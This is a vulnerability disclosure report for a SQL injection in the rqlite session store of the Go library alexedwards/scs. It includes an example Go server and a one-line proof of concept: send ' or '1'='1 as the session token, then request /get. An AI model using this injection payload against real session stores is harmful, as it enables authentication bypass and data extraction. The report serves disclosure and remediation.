SQL Injection in alexedwards/scs
Valid
Reported on
May 24th 2022
Description
A SQL injection vulnerability in the rqlite session store (rqlitestore).
Proof of Concept
Use the example code below:
package main
import (
	"io"
	"log"
	"net/http"
	"time"

	"github.com/alexedwards/scs/rqlitestore"
	"github.com/alexedwards/scs/v2"
	"github.com/rqlite/gorqlite"
)
// sessionManager is the process-wide session manager. main wires its
// Store to rqlite and both handlers read and write sessions through it.
var sessionManager *scs.SessionManager
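// main connects to rqlite, builds a session manager backed by
// rqlitestore, and serves /put and /get behind the LoadAndSave
// session middleware on :4000.
func main() {
	// Establish connection to rqlite.
	conn, err := gorqlite.Open("http://localhost:4001/")
	if err != nil {
		log.Fatal(err)
	}
	defer conn.Close()

	// Initialize a new session manager and configure it to use
	// rqlitestore as the session store. The session token the store
	// looks up is taken from the incoming request (see the PoC), so it
	// is attacker-controlled input: the store must hand it to rqlite as
	// a bound parameter, never by string concatenation into the query.
	sessionManager = scs.New()
	sessionManager.Store = rqlitestore.New(conn)

	mux := http.NewServeMux()
	mux.HandleFunc("/put", putHandler)
	mux.HandleFunc("/get", getHandler)

	// A bare http.ListenAndServe has no timeouts; bound slow clients.
	srv := &http.Server{
		Addr:              ":4000",
		Handler:           sessionManager.LoadAndSave(mux),
		ReadHeaderTimeout: 10 * time.Second,
		WriteTimeout:      30 * time.Second,
	}
	// The serve error was previously discarded; surface it so a bind
	// failure is visible instead of exiting silently with status 0.
	// (log.Fatal exits, so the deferred conn.Close does not run — same
	// as the original, where ListenAndServe never returned normally.)
	log.Fatal(srv.ListenAndServe())
}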
// putHandler stores a fixed greeting under the "message" key in the
// caller's session; persistence is handled by the LoadAndSave
// middleware wrapped around the mux in main.
func putHandler(w http.ResponseWriter, r *http.Request) {
	const key = "message"
	ctx := r.Context()
	sessionManager.Put(ctx, key, "Hello from a session!")
}
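// getHandler writes the "message" value from the caller's session to
// the response body.
func getHandler(w http.ResponseWriter, r *http.Request) {
	msg := sessionManager.GetString(r.Context(), "message")
	// The write error was discarded; log it rather than dropping it,
	// so a client that vanished mid-response is at least visible.
	if _, err := io.WriteString(w, msg); err != nil {
		log.Printf("writing session message: %v", err)
	}
}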
use ' or '1'='1
as token, then access /get
A debug view looks like this:
Impact
Data extraction or authentication bypass (logging in as admin) — the standard consequences of a SQL injection, made more severe here because it occurs in session middleware.